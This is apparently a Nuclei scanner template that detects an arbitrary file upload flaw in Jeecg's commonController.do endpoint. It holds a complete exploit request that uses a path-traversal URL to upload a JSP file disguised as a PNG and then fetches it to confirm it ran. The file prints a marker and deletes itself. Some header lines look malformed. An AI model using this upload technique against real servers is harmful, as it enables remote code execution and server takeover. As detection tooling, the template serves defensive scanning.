id: jeecgboot-commonController-fileupload
info:
  name: Jeecgboot commonController.do - fileupload
  author: leadlife
  severity: critical
  description: Jeecg 快速开发平台，可以应用在任何J2EE项目的开发中，尤其适合企业信息管理系统（MIS）、内部办公系统（OA）、企业资源计划系统（ERP）、客户关系管理系统（CRM）等，其半智能手工Merge的开发方式，可以显著提高开发效率70%以上，极大降低开发成本。其commonController.do接口存在任意文件上传漏洞，可悲攻击者上传恶意脚本，导致服务器被控。
  reference: 
    - https://github.com/wy876/POC/blob/31a1d029b89778347a04f3e5c3d2f400259cc10d/JeecgBoot/Jeecg%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: false
    fofa-query: demo
    hunter-query: demo
    tips:
    repair:
    version:
  tags: 2024,jeecgboot,jeecg,fileupload

variables:
    filename: "{{to_lower(rand_base(4))}}"
    date: '{{date_time("%Y%M%D%H%M%S")}}'

http:
  - raw:
      - |
        POST /api/../commonController.do?parserXml HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 463
        User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        Connection: close

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; "name="name"

        {{filename}}.png
        ------WebKitFormBoundarygcflwtei
        ontent-Disposition: form-data; name="documentTitle"

        blank
        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file"; filename="{{filename}}.jsp"
        Content-Type: image/png

        <% out.println("{{randstr}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundarygcflwtei--
        
      - |+
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && status_code_2 == 200
          - contains_all(body_2,'{{randstr}}')
        condition: and